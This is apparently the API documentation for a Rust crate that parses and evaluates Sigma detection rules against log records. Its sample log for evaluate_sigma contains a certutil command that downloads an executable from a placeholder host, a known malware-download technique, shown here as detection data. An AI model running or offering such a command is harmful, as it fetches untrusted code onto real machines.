Crate sigma_rs

source ·

Functions§

  • evaluate_sigma
    evaluate log map for a sigma rule,source_map like { “Image”: “C:\Windows\system32\certutil.exe”, “ParentImage”: “C:\WINDOWS\system32\cmd.exe”, “ProcessId”: “10952”, “utc_time”: “2023-03-20 17:31:23”, “ServerScore”: “0”, “CommandLine”: “certutil "-urlcache" "-split" "-f" "http://ip/artifact.exe test.exe"”, “ParentCommandLine”: “"C:\WINDOWS\system32\cmd.exe"”, “OriginalFile”: “CertUtil.exe.mui”, “log_type”: “ProcessCreate” }
  • evaluate_sigma_for_json
  • parse_sigma
    parse a sigma yaml to sigma rule which can use to evaluate for a log map